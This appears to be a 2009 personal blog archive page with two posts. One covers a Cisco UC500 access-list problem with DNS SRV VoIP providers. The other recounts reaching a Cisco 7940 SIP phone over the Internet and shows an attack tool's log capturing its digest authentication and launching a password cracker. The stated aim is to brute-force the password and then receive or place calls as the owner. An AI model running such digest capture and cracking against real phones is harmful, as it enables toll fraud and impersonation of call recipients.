Sjur Usken

Views on new technologies and business opportunities from Sjur Usken

Monthly Archives: April 2009

Cisco with their UC500 has not understood DNS SRV….

Just setting up a Cisco UC500 and notice how “old fashioned” the VoIP settings are. The setup still believes that the provider only has one major IP address and one backup. Of course, to have one basic IP address where all traffic is routed to, and make this redudant (through virtual IP or IP take-over), is just fine and will work OK.

The DNS SRV case

If you as a VoIP Service Provider uses DNS SRV, which is designed to give you load sharing and redundancy through DNS, then the Cisco Configuration Assistant misses the point. This assistant, which is almost necessary to get the UC500 unit up and running, does a DNS lookup on the A record and takes this IP into the Access List configuration…. not good… Next time the UC500 registers, it probably uses another server, and the incoming calls are also coming from this. Then the ACL kicks in and blocks the call…

The work-around

For CCA version 1.9 there is an access-list 2 that contains the IP of the SIP server. Expand this list to cover all IP addresses from your VoIP provider. Be careful, since opening this to everybody will open you for both SPiT and possible fraud.

And the Cisc 7940 phones leaks its password hash..

With some help from Sean in the US, Sandro and I could access a Cisco 7940 phone (with a SIP stack) from the Internet. We called it from our public ip (showed as

[ Fri Apr 10 21:16:16 2009 ]( Proxy auth:
[‘Digest username=”5555914760″,realm=”localhost”,uri=”sip:″,response=”a718dsf8c742799f1c22fbcd1d4637d801b”,nonce=”a”,algorithm=MD5’]
[ Fri Apr 10 21:16:16 2009 ]( The phone rings on extension 5555914760
[ Fri Apr 10 21:16:16 2009 ]( Launching the password cracker
[ Fri Apr 10 21:16:18 2009 ]( Password was not guessed
[ Fri Apr 10 21:16:18 2009 ]( Use the SIP Digest Cracker to perform an extensive bruteforce
[ Fri Apr 10 21:16:18 2009 ]( username: 5555914760
[ Fri Apr 10 21:16:18 2009 ]( nonce: a
[ Fri Apr 10 21:16:18 2009 ]( realm: localhost
[ Fri Apr 10 21:16:18 2009 ]( uri: sip:
[ Fri Apr 10 21:16:18 2009 ]( method: BYE
[ Fri Apr 10 21:16:18 2009 ]( response: a7188cfwet742799f1c22fbcd1d4637d801b

Then we could start our brute forcing of the password, and then either log-in and receive calls as Sean, or make outbound calls as him. Next phone to test is the Snom phone.